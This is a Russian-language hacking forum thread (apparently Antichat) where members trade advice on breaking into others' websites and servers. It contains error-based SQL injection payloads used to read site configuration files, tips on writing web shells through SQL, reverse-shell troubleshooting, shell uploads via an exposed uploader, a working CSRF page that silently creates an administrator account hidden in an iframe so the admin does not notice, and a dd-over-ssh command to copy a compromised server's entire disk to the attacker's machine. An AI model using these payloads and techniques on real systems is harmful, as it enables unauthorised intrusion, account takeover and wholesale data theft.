Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) +, 27.04.2015.

  1. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    711
    Одобрения:
    815
    Репутация:
    51
    Есть ещё пару вариантов, хотя с 0x272f6562616c2f74766f752f6d616d6b752f62726f2e74687827 нету вариантов, жаль
     
  2. exT1ma4ka

    exT1ma4ka New Member

    Регистрация:
    12.05.2010
    Сообщения:
    40
    Одобрения:
    1
    Репутация:
    5
    вывода нет, только error based. типа:
    Code:
    OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID(VERSION(), FLOOR(RAND(33)*2), 64))-- 
    Code:
    OR ExtractValue(1,concat(0x5c,(VERSION())))--
    в них файл не отображается, просто страница грузится в рабочем режиме.
     
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    594
    Репутация:
    66
    error-based тоже вывод)
    чтение файла можно и через boolean проверить конструкцией length(load_file('/etc/shells'))>0 , ну так, может когда пригодится

    файл кстати какой читал? может там open_basedir, если докрут известен - попробуй index.php прочитать
     
    _________________________
    Это одобряют crlf и exT1ma4ka.
  4. Gorev

    Gorev Level 8

    Регистрация:
    31.03.2006
    Сообщения:
    2 589
    Одобрения:
    1 208
    Репутация:
    273
    читай конфиги сервера, ищи полный путь до сайта, читай конфиги сайта (возможно есть пхпмайадмин), может на соседних сайтах есть пхпмайадмин, записывай через пыху шелл, может возможно удаленное подключение к мускулю.
     
    Это одобряет exT1ma4ka.
  5. exT1ma4ka

    exT1ma4ka New Member

    Регистрация:
    12.05.2010
    Сообщения:
    40
    Одобрения:
    1
    Репутация:
    5
    пути известны.
    /../../public_html/configuration.php (joomla)
    результат не виден. просто рабочая страница. даже если имя файла в запросе изменить на неправильное.

    но опять таки, внутри LOAD_FILE(тут) - мне приходится конструкцию с путями и кавычками писать в hex, ибо ' фильтруются.
     
  6. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Вместо INTO OUTFILE можно использовать INTO DUMPFILE.
     
    Это одобряет exT1ma4ka.
  7. karkajoi

    karkajoi Member

    Регистрация:
    26.10.2016
    Сообщения:
    125
    Одобрения:
    57
    Репутация:
    1
    Такой вопрос, пытаюсь поднять backconnect ,но не работает ни С и perl python скрипты, то есть 0 на массу при попытке соединения, но если пробую через php скрипт соединения появлсятся и сразу пропадает , netcat ставлю с таками параметрами -lvnp 443 -lvp 443 ( пробовал разные порты, смотрел какие порты открыты на сервере), но всеравно результат один и тот же, соединение появляется и сразу netcat вылетает. В какую сторону копать?
    Вот модули что есть на серве
    Code:
    Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_auth_digest, mod_authn_file, mod_authn_alias, mod_authn_anon, mod_authn_dbm, mod_authn_default, mod_authz_host, mod_authz_user, mod_authz_owner, mod_authz_groupfile, mod_authz_dbm, mod_authz_default, util_ldap, mod_authnz_ldap, mod_include, mod_log_config, mod_logio, mod_env, mod_ext_filter, mod_mime_magic, mod_expires, mod_deflate, mod_headers, mod_usertrack, mod_setenvif, mod_mime, mod_dav, mod_autoindex, mod_info, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_actions, mod_speling, mod_userdir, mod_alias, mod_substitute, mod_rewrite, mod_proxy, mod_proxy_balancer, mod_proxy_ftp, mod_proxy_http, mod_proxy_ajp, mod_proxy_connect, mod_cache, mod_suexec, mod_disk_cache, mod_cgi, mod_version, mod_php5, mod_apreq2, mod_rpaf, mod_perl
    
    И 2й вопрос, если я успешно получаю рут права как мне сделать шел что б запускался от рута, а не от apacha?
     
  8. SaNDER

    SaNDER Member

    Регистрация:
    9.07.2015
    Сообщения:
    213
    Одобрения:
    15
    Репутация:
    3
    Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно
    В заголовке написано Uplodify Test .
    При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,
    Но точно ли он загружает или для виду,это же,типо тест...
    А если и загружает то куда,непонятно.Как узнать?

    И ещё вопрос я попал на FTP
    ftp://***-***-***-**.*****.******.***
    Могу всякие файлы читать,но файлов слишком много,аж лагает .
    Есть ли какие-нибудь программы для скана директорий FTP?
     
    #2008 SaNDER, 17.07.2017
    В последний раз редактировалось: 17.07.2017
  9. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    1) Брутить стандартные пути папки upload, images, avatrs и прочее у можно dirb'у скормить словарь. Второй потыкать форум на предмет FPD(Открытие пути файла), Третий, скачать фреймворк с паблика и посмотреть куда он льет по дефолту.
     
    _________________________
    Это одобряет ghost8.
  10. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Изучал атаку xss через svg все показалось просто но почему на том же hackerone такие атаки мение цены чем стандартные xss на томже ютубе ненахожу примеры кражи куков через svg, я что то недопонимаю ?
     
  11. RedFern.89

    RedFern.89 Member

    Регистрация:
    20.01.2010
    Сообщения:
    559
    Одобрения:
    45
    Репутация:
    0
    Говорит ли наличие такой ошибки о sql-inj?
    Code:
    syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20
     
  12. ACat

    ACat Member

    Регистрация:
    10.03.2017
    Сообщения:
    163
    Одобрения:
    31
    Репутация:
    0
    не обязательно.
     
  13. SaNDER

    SaNDER Member

    Регистрация:
    9.07.2015
    Сообщения:
    213
    Одобрения:
    15
    Репутация:
    3
    Как подключиться к InterBase?
    Логин и пароль знаю,а как подключиться нет .
    IBConsole запустил и понять в ней ничего не могу.Версия новая .
     
    #2013 SaNDER, 28.07.2017
    В последний раз редактировалось: 28.07.2017
  14. kacergei

    kacergei Member

    Регистрация:
    26.05.2007
    Сообщения:
    156
    Одобрения:
    8
    Репутация:
    0
    Подскажите webshell для windows с backconnect'ом в комплекте
    PS на сервере php,node
    или отдельно backconnect с примером его запуска
     
  15. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Делаю POST CSRF
    Code:
    <html>
    <body onload="document.csrf.submit()">
    <form action="http://site/cp/newuser/" name="csrf" method="POST">
    <input type="hidden" name="login" value="hack">
    <input type="hidden" name="newp" value="hack">
    <input type="hidden" name="newp1" value="hack">
    </form>
    </body>
    </html>
    Все срабатывает отлично но после атаки админа редиректит в /users/ и он спалит нового админа так вот как поменять и этот редирект?
     
  16. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    289
    Одобрения:
    412
    Репутация:
    119
    Редирект ты вряд ли сможешь упразднить, но оно и не нужно. CSRF обычно в ифрейм прячется, примерно так будет выглядеть:

    PHP:
    <html>
    <
    head>
    <
    title>CSRF</title>
    </
    head>
       <
    body onload='document.forms.csrf.submit();'>
         <
    form action="http://site/cp/newuser/" name="csrf" method="POST" target="iframe">
           <
    input type="hidden" name="login" value="hack">
           <
    input type="hidden" name="newp" value="hack">
           <
    input type="hidden" name="newp1" value="hack">
         </
    form>
         <
    iframe src="" style="display:none;" name="iframe" id="iframe"></iframe>
       </
    body>
    </
    html>
     
  17. kacergei

    kacergei Member

    Регистрация:
    26.05.2007
    Сообщения:
    156
    Одобрения:
    8
    Репутация:
    0
    Имеется root на сервере
    Code:
    root@server:# uname -a
    Linux server 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    
    root@server:# df -h
    Filesystem      Size  Used Avail Use% Mounted on
    udev            490M     0  490M   0% /dev
    tmpfs           100M   11M   89M  11% /run
    /dev/vda1        30G   18G   12G  60% /
    tmpfs           497M     0  497M   0% /dev/shm
    tmpfs           5.0M     0  5.0M   0% /run/lock
    tmpfs           497M     0  497M   0% /sys/fs/cgroup
    tmpfs           100M     0  100M   0% /run/user/0
    
    root@server:# lsblk -a
    NAME   MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
    vda    253:0    0  30G  0 disk
    └─vda1 253:1    0  30G  0 part /
    loop0    7:0    0       0 loop
    loop1    7:1    0       0 loop
    loop2    7:2    0       0 loop
    loop3    7:3    0       0 loop
    loop4    7:4    0       0 loop
    loop5    7:5    0       0 loop
    loop6    7:6    0       0 loop
    loop7    7:7    0       0 loop
    
    
    Подскажите как имея ssh сделать образ/backup удаленной машины (то есть всей системы/hdd)?
    И скачать налету упакованный образ/архив (при условии если места не хватит)
    В последствии поднять данный образ в VM
     
  18. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    289
    Одобрения:
    412
    Репутация:
    119
    Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:
    Code:
    dd if=/dev/vda | ssh root@yourserver.com -p22 "cat > vda_image"
    
    А потом гуглить "dd image to vm" и пробовать заводить этот образ :)
     
  19. kacergei

    kacergei Member

    Регистрация:
    26.05.2007
    Сообщения:
    156
    Одобрения:
    8
    Репутация:
    0
    Ранее с таким не сталкивался, потому вопрос может быть очень глупым
    )))
    Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
    "cat > vda_image" я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh root@xxx.xxx.xxx.xx -p22 "cat > /root/folder_on_my_computer/vda_image_file"
    Я верно понял?
    P.S> как узнать предположительный размер конечного файла?
    Дабы решить на какую удаленную лить (место не резиновое =) )
     
  20. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    594
    Репутация:
    66
    смонтируй директорию(хоть корень) через sshfs
    Code:
    sshfs user@hostname:/remote/path /sshfs_local_folder
    
    и работай как с локальной системой, tar там или ещё чего, создать iso можно так
    Code:
    mkisofs -lJR -o output_image.iso sshfs_local_folder
    
    по идее должно работать
     
    _________________________
    Это одобряет crlf.
Загрузка...
Similar Threads - вопросы уязвимостям
  1. brand29
    Ответы:
    1
    Просмотры:
    1 201
  2. Yandex
    Ответы:
    15
    Просмотры:
    2 549
  3. Omgg
    Ответы:
    9
    Просмотры:
    1 921
  4. sinij1
    Ответы:
    12
    Просмотры:
    2 230